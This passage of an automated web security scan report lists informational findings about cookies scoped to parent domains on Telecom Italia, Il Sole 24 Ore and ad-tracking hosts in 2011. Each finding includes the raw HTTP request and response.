HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:29:40 GMT
Server: Apache
Set-Cookie: kp=1304375380042730; path=/; expires=Thu, 29-Apr-21 22:29:40 GMT; domain=.alice.it
Last-Modified: Fri, 01 Apr 2011 09:22:36 GMT
ETag: "262b9e-b3c-f3540f00"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Type: text/css
Content-Length: 2876

.conthome .visulhead { background:url(../images/hp/mail_alice_michelle_2011_v3.jpg) no-repeat 0 0;}
#registra_gratis_adsl { float:left; margin-right:25px; margin-left:10px; }
#registra_gratis_tim { }

...[SNIP]...

14.49. http://mail.alice.it/css/stili_stampa.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mail.alice.it
Path:   /css/stili_stampa.css

Issue detail

The application issued a cookie that is scoped to a parent of the issuing domain; it appears in the Set-Cookie header of the response below. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /css/stili_stampa.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: mail.alice.it

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:29:42 GMT
Server: Apache
Set-Cookie: kp=1304375382444777; path=/; expires=Thu, 29-Apr-21 22:29:42 GMT; domain=.alice.it
Last-Modified: Tue, 04 Nov 2008 09:56:40 GMT
ETag: "262b94-57ca-147dc600"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Type: text/css
Content-Length: 22474

/*BODY*/
    * {margin:0;padding:0;}@page {size: 210mm 297mm; margin: 30mm;}
   /* NORMALE*/ body {margin:3px 0 5px 0;background:#FFFFFF ;font: 11px Arial, Helvetica,    sans-serif;}
   .clear {clear:both;
...[SNIP]...

14.50. http://mail.alice.it/images/bg_bottombox0.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mail.alice.it
Path:   /images/bg_bottombox0.gif

Issue detail

The application issued a cookie that is scoped to a parent of the issuing domain; it appears in the Set-Cookie header of the response below. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/bg_bottombox0.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: mail.alice.it

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:29:46 GMT
Server: Apache
Set-Cookie: kp=1304375386378621; path=/; expires=Thu, 29-Apr-21 22:29:46 GMT; domain=.alice.it
Last-Modified: Mon, 22 Sep 2008 09:48:37 GMT
ETag: "4259de-614-f486a740"
Accept-Ranges: bytes
Content-Length: 1556
Content-Type: image/gif

...[SNIP]...

14.51. http://mail.alice.it/images/bg_pop.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mail.alice.it
Path:   /images/bg_pop.jpg

Issue detail

The application issued a cookie that is scoped to a parent of the issuing domain; it appears in the Set-Cookie header of the response below. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/bg_pop.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: mail.alice.it

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:29:38 GMT
Server: Apache
Set-Cookie: kp=1304375378737662; path=/; expires=Thu, 29-Apr-21 22:29:38 GMT; domain=.alice.it
Last-Modified: Mon, 03 Nov 2008 09:02:47 GMT
ETag: "cf3200-182-35f2bbc0"
Accept-Ranges: bytes
Content-Length: 386
Content-Type: image/jpeg

...[SNIP]...

14.52. http://mail.alice.it/images/bt_registrati00.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mail.alice.it
Path:   /images/bt_registrati00.gif

Issue detail

The application issued a cookie that is scoped to a parent of the issuing domain; it appears in the Set-Cookie header of the response below. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/bt_registrati00.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: mail.alice.it

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:29:45 GMT
Server: Apache
Set-Cookie: kp=1304375385160330; path=/; expires=Thu, 29-Apr-21 22:29:45 GMT; domain=.alice.it
Last-Modified: Wed, 17 Sep 2008 09:37:28 GMT
ETag: "4259cd-b3e-3771a600"
Accept-Ranges: bytes
Content-Length: 2878
Content-Type: image/gif

...[SNIP]...

14.53. http://mail.alice.it/images/butt_registrati.png

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mail.alice.it
Path:   /images/butt_registrati.png

Issue detail

The application issued a cookie that is scoped to a parent of the issuing domain; it appears in the Set-Cookie header of the response below. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/butt_registrati.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: mail.alice.it

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:29:48 GMT
Server: Apache
Set-Cookie: kp=1304375388266392; path=/; expires=Thu, 29-Apr-21 22:29:48 GMT; domain=.alice.it
Last-Modified: Mon, 14 Jun 2010 10:30:44 GMT
ETag: "89dc9c-d61-fb2bdd00"
Accept-Ranges: bytes
Content-Length: 3425
Content-Type: image/png

...[SNIP]...

14.54. http://mail.alice.it/images/header/immagine.png

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mail.alice.it
Path:   /images/header/immagine.png

Issue detail

The application issued a cookie that is scoped to a parent of the issuing domain; it appears in the Set-Cookie header of the response below. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/header/immagine.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: mail.alice.it

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:29:46 GMT
Server: Apache
Set-Cookie: kp=1304375386383663; path=/; expires=Thu, 29-Apr-21 22:29:46 GMT; domain=.alice.it
Last-Modified: Mon, 14 Jun 2010 10:31:05 GMT
ETag: "11c600-3fbd-fc6c4c40"
Accept-Ranges: bytes
Content-Length: 16317
Content-Type: image/png

...[SNIP]...

14.55. http://mail.alice.it/images/ico_busta_link.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mail.alice.it
Path:   /images/ico_busta_link.gif

Issue detail

The application issued a cookie that is scoped to a parent of the issuing domain; it appears in the Set-Cookie header of the response below. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/ico_busta_link.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: mail.alice.it

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:29:46 GMT
Server: Apache
Set-Cookie: kp=1304375386492394; path=/; expires=Thu, 29-Apr-21 22:29:46 GMT; domain=.alice.it
Last-Modified: Mon, 22 Sep 2008 09:14:24 GMT
ETag: "4259e0-411-7a285c00"
Accept-Ranges: bytes
Content-Length: 1041
Content-Type: image/gif

...[SNIP]...

14.56. http://mail.alice.it/images/ico_disc_red.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mail.alice.it
Path:   /images/ico_disc_red.gif

Issue detail

The application issued a cookie that is scoped to a parent of the issuing domain; it appears in the Set-Cookie header of the response below. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/ico_disc_red.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: mail.alice.it

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:29:45 GMT
Server: Apache
Set-Cookie: kp=1304375385295016; path=/; expires=Thu, 29-Apr-21 22:29:45 GMT; domain=.alice.it
Last-Modified: Mon, 22 Sep 2008 07:49:58 GMT
ETag: "4259d9-42-4c335580"
Accept-Ranges: bytes
Content-Length: 66
Content-Type: image/gif


14.57. http://mail.alice.it/images/ico_preferiti.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mail.alice.it
Path:   /images/ico_preferiti.gif

Issue detail

The application issued a cookie that is scoped to a parent of the issuing domain; it appears in the Set-Cookie header of the response below. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/ico_preferiti.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: mail.alice.it

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:29:48 GMT
Server: Apache
Set-Cookie: kp=1304375388041112; path=/; expires=Thu, 29-Apr-21 22:29:48 GMT; domain=.alice.it
Last-Modified: Mon, 22 Sep 2008 09:12:19 GMT
ETag: "4259dc-3fa-72b502c0"
Accept-Ranges: bytes
Content-Length: 1018
Content-Type: image/gif

GIF89a..........g............~........u......d..........A.................}]....x.........3i...|...f..0e...@..f........r..S.....l.....$..9..I..j.....w..C..F.....n.....A...^....8B}...C...d.......=..pk
...[SNIP]...

14.58. http://mail.alice.it/images/ico_stampa.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mail.alice.it
Path:   /images/ico_stampa.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/ico_stampa.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: mail.alice.it

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:29:48 GMT
Server: Apache
Set-Cookie: kp=1304375388512456; path=/; expires=Thu, 29-Apr-21 22:29:48 GMT; domain=.alice.it
Last-Modified: Mon, 22 Sep 2008 09:13:39 GMT
ETag: "4259dd-243-7779b6c0"
Accept-Ranges: bytes
Content-Length: 579
Content-Type: image/gif

GIF89a.....P.......~.....Gun..T~.......x.....Dn....b........u.................)S.......c..l..t...........Z..............i...........y..p..@j....Bl.....Iw..................o........g...Hv...r..5_....(
...[SNIP]...

14.59. http://mail.alice.it/images/ico_vverde15.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mail.alice.it
Path:   /images/ico_vverde15.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/ico_vverde15.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: mail.alice.it

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:29:45 GMT
Server: Apache
Set-Cookie: kp=1304375385156858; path=/; expires=Thu, 29-Apr-21 22:29:45 GMT; domain=.alice.it
Last-Modified: Thu, 25 Sep 2008 08:40:26 GMT
ETag: "5fe6ab-414-5a351280"
Accept-Ranges: bytes
Content-Length: 1044
Content-Type: image/gif

GIF89a..........R.#S.$N..P. S.#T.%T.$......R."O.....F..Q.!......M.....H..Q. ...V.(L..z.T.........y.R......Q."f.:M.....L......................z..{U.'......_.3............I.....h.?U.&c.8s.M...}.Ym.EK...
...[SNIP]...

14.60. http://mail.alice.it/images/ico_xrosso15.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mail.alice.it
Path:   /images/ico_xrosso15.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/ico_xrosso15.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: mail.alice.it

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:29:45 GMT
Server: Apache
Set-Cookie: kp=1304375385155948; path=/; expires=Thu, 29-Apr-21 22:29:45 GMT; domain=.alice.it
Last-Modified: Thu, 25 Sep 2008 09:42:12 GMT
ETag: "eb957-412-371a2500"
Accept-Ranges: bytes
Content-Length: 1042
Content-Type: image/gif

GIF89a......................................................................2G.......2E....r..0F..............B. ,..(.... ,.......I\....CP....................#......BN.......cr................L_....
...[SNIP]...

14.61. http://mail.alice.it/js/scriptflash.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mail.alice.it
Path:   /js/scriptflash.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/scriptflash.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: mail.alice.it

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:29:47 GMT
Server: Apache
Set-Cookie: kp=1304375387874728; path=/; expires=Thu, 29-Apr-21 22:29:47 GMT; domain=.alice.it
Last-Modified: Tue, 04 Nov 2008 10:52:14 GMT
ETag: "aaf778-743-db369380"
Accept-Ranges: bytes
Content-Length: 1859
Content-Type: application/x-javascript

// JavaScript Document
function includeSwf(width,height,src,flashvars)
{
   document.write (
'<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"\n'+
    'codebase="http://download.ma
...[SNIP]...

14.62. http://media.fastclick.net/w/tre

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media.fastclick.net
Path:   /w/tre

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /w/tre?ad_id=21392;evt=16670;cat1=20430;cat2=20431;rand='%20+%20Math.round(Math.random()*10000000)%20+%20' HTTP/1.1
Host: media.fastclick.net
Proxy-Connection: keep-alive
Referer: http://www.telecomitalia.it/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pjw=BAEAAAACIAMDfqe+TSAGAQABIAMC6HgEYAcCb10IIA1AEwEAAA==; vt=9556:293096:548207:53962:0:1304340350:1|; adv_ic=BwEAAAB+p75NIAYGAAFJAAC0ViAHIAsDAAAAAA==; lyc=AwAAAARv+75NACAAAWVfIASgAARbUwAAcuAKF+ADAOAFLwEAAA==; pluto=822523287793|v1

Response

HTTP/1.1 302 Redirect
Date: Mon, 02 May 2011 22:13:52 GMT
Location: https://www.googleadservices.com/pagead/conversion/1022934834/?label=2HoJCPStogIQsv7i5wM&amp;guid=ON&amp;script=0
P3P: CP='NOI DSP DEVo TAIo COR PSA OUR IND NAV'
Cache-Control: no-cache
Pragma: no-cache
Expires: 0
Content-Type: text/plain
Content-Length: 0
Set-Cookie: lyc=BAAAAARv+75NACAAAWVfIASgAARbUwAAcuAKF0AAAqAsv2AvAJAgI8AAAZdVwAngBRcDz08AAA==; domain=.fastclick.net; path=/; expires=Wed, 01-May-2013 22:13:52 GMT
Set-Cookie: pluto=822523287793|v1; domain=.fastclick.net; path=/; expires=Wed, 01-May-2013 22:13:52 GMT


14.63. http://metrics.ilsole24ore.com/b/ss/s24onewsprod,s24oglobal/1/H.20.3/s78620203291065

Summary

Severity:   Information
Confidence:   Certain
Host:   http://metrics.ilsole24ore.com
Path:   /b/ss/s24onewsprod,s24oglobal/1/H.20.3/s78620203291065

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/s24onewsprod,s24oglobal/1/H.20.3/s78620203291065?AQB=1&ndh=1&t=2/4/2011%2022%3A13%3A52%201%20300&ce=ISO-8859-1&ns=ilsole24ore&pageName=N24%3Ahome%3Ahome&g=http%3A//www.ilsole24ore.com/&cc=EUR&ch=N24%3Ahome&events=event1&c1=N24%3Ahome%3Ahome&v1=D%3Dc1&h1=N24%2Chome&c2=N24%3Ahome%3Ahome&v2=D%3Dc2&c3=N24%3Ahome%3Ahome&v3=D%3Dc3&c4=N24%3Ahome%3Ahome&c9=N24%3Ahome&v9=D%3Dc9&c11=5%3A00AM&v11=D%3Dc11&c12=Tuesday&v12=D%3Dc12&c13=Weekday&v13=D%3Dc13&c14=New&v14=D%3Dc14&c15=Not%20logged%20in&v15=D%3Dc15&c16=First%20page%20view%20or%20cookies%20not%20supported&v16=First%20page%20view%20or%20cookies%20not%20supported&c49=D%3Ds_vi&v49=D%3DpageName&v50=D%3Dch&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1074&bh=903&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.ilsole24ore.com
Proxy-Connection: keep-alive
Referer: http://www.ilsole24ore.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_nr=1304392432178-New; s_lastvisit=1304392432179; SC_LINKS_NW=%5B%5BB%5D%5D

Response

HTTP/1.1 302 Found
Date: Mon, 02 May 2011 22:17:41 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26DF96C2851D06B3-4000012760000DEA[CE]; Expires=Sat, 30 Apr 2016 22:17:41 GMT; Domain=.ilsole24ore.com; Path=/
Location: http://metrics.ilsole24ore.com/b/ss/s24onewsprod,s24oglobal/1/H.20.3/s78620203291065?AQB=1&pccr=true&vidn=26DF96C2851D06B3-4000012760000DEA&&ndh=1&t=2/4/2011%2022%3A13%3A52%201%20300&ce=ISO-8859-1&ns=ilsole24ore&pageName=N24%3Ahome%3Ahome&g=http%3A//www.ilsole24ore.com/&cc=EUR&ch=N24%3Ahome&events=event1&c1=N24%3Ahome%3Ahome&v1=D%3Dc1&h1=N24%2Chome&c2=N24%3Ahome%3Ahome&v2=D%3Dc2&c3=N24%3Ahome%3Ahome&v3=D%3Dc3&c4=N24%3Ahome%3Ahome&c9=N24%3Ahome&v9=D%3Dc9&c11=5%3A00AM&v11=D%3Dc11&c12=Tuesday&v12=D%3Dc12&c13=Weekday&v13=D%3Dc13&c14=New&v14=D%3Dc14&c15=Not%20logged%20in&v15=D%3Dc15&c16=First%20page%20view%20or%20cookies%20not%20supported&v16=First%20page%20view%20or%20cookies%20not%20supported&c49=D%3Ds_vi&v49=D%3DpageName&v50=D%3Dch&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1074&bh=903&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1
X-C: ms-4.4.1
Expires: Sun, 01 May 2011 22:17:41 GMT
Last-Modified: Tue, 03 May 2011 22:17:41 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www259
Content-Length: 0
Content-Type: text/plain


14.64. http://metrics.ilsole24ore.com/b/ss/s24oshoppreprod/1/H.20.3/s76706321355364

Summary

Severity:   Information
Confidence:   Certain
Host:   http://metrics.ilsole24ore.com
Path:   /b/ss/s24oshoppreprod/1/H.20.3/s76706321355364

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/s24oshoppreprod/1/H.20.3/s76706321355364?AQB=1&ndh=1&t=2/4/2011%2022%3A31%3A6%201%20300&ce=ISO-8859-1&ns=ilsole24ore&g=about%3Ablank&cc=EUR&c42=undefined&c44=undefined%20%7C%20no%20%26lid&s=1920x1200&c=16&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_e&pev1=http%3A//www.casa24.ilsole24ore.com/&pid=about%3Ablank&oid=http%3A//www.casa24.ilsole24ore.com/&ot=A&oi=38&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: metrics.ilsole24ore.com

Response

HTTP/1.1 302 Found
Date: Mon, 02 May 2011 22:34:54 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26DF98C7051D06F6-60000126C001D9F4[CE]; Expires=Sat, 30 Apr 2016 22:34:54 GMT; Domain=.ilsole24ore.com; Path=/
Location: http://metrics.ilsole24ore.com/b/ss/s24oshoppreprod/1/H.20.3/s76706321355364?AQB=1&pccr=true&vidn=26DF98C7051D06F6-60000126C001D9F4&&ndh=1&t=2/4/2011%2022%3A31%3A6%201%20300&ce=ISO-8859-1&ns=ilsole24ore&g=about%3Ablank&cc=EUR&c42=undefined&c44=undefined%20%7C%20no%20%26lid&s=1920x1200&c=16&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_e&pev1=http%3A//www.casa24.ilsole24ore.com/&pid=about%3Ablank&oid=http%3A//www.casa24.ilsole24ore.com/&ot=A&oi=38&AQE=1
X-C: ms-4.4.1
Expires: Sun, 01 May 2011 22:34:54 GMT
Last-Modified: Tue, 03 May 2011 22:34:54 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www254
Content-Length: 0
Content-Type: text/plain


14.65. http://omniture.virgilio.it/b/ss/tiecommercepreprod,tivirgilioglobalpreprod/1/H.22.1/s79412251526955

Summary

Severity:   Information
Confidence:   Certain
Host:   http://omniture.virgilio.it
Path:   /b/ss/tiecommercepreprod,tivirgilioglobalpreprod/1/H.22.1/s79412251526955

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/tiecommercepreprod,tivirgilioglobalpreprod/1/H.22.1/s79412251526955?AQB=1&ndh=1&t=2%2F4%2F2011%2022%3A13%3A45%201%20300&ns=telecomitalia&pageName=ECM%3AHome&g=http%3A%2F%2Fwww.telecomitalia.it%2F&cc=EUR&ch=Home&events=event1&h1=Home&h2=telecomitalia.it%2CECM%2CHome&v5=D%3DpageName&v6=D%3Dch&c9=ECM&v9=ECM&c10=telecomitalia.it&v10=telecomitalia.it&c11=New&v11=New&c12=manuale%2Fcms&v16=navigazione&v17=non-browse&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1074&bh=903&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: omniture.virgilio.it
Proxy-Connection: keep-alive
Referer: http://www.telecomitalia.it/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Mon, 02 May 2011 22:16:15 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26DF96978507A1D7-6000010040005559[CE]; Expires=Sat, 30 Apr 2016 22:16:15 GMT; Domain=.virgilio.it; Path=/
Location: http://omniture.virgilio.it/b/ss/tiecommercepreprod,tivirgilioglobalpreprod/1/H.22.1/s79412251526955?AQB=1&pccr=true&vidn=26DF96978507A1D7-6000010040005559&&ndh=1&t=2%2F4%2F2011%2022%3A13%3A45%201%20300&ns=telecomitalia&pageName=ECM%3AHome&g=http%3A%2F%2Fwww.telecomitalia.it%2F&cc=EUR&ch=Home&events=event1&h1=Home&h2=telecomitalia.it%2CECM%2CHome&v5=D%3DpageName&v6=D%3Dch&c9=ECM&v9=ECM&c10=telecomitalia.it&v10=telecomitalia.it&c11=New&v11=New&c12=manuale%2Fcms&v16=navigazione&v17=non-browse&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1074&bh=903&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1
X-C: ms-4.4.1
Expires: Sun, 01 May 2011 22:16:15 GMT
Last-Modified: Tue, 03 May 2011 22:16:15 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
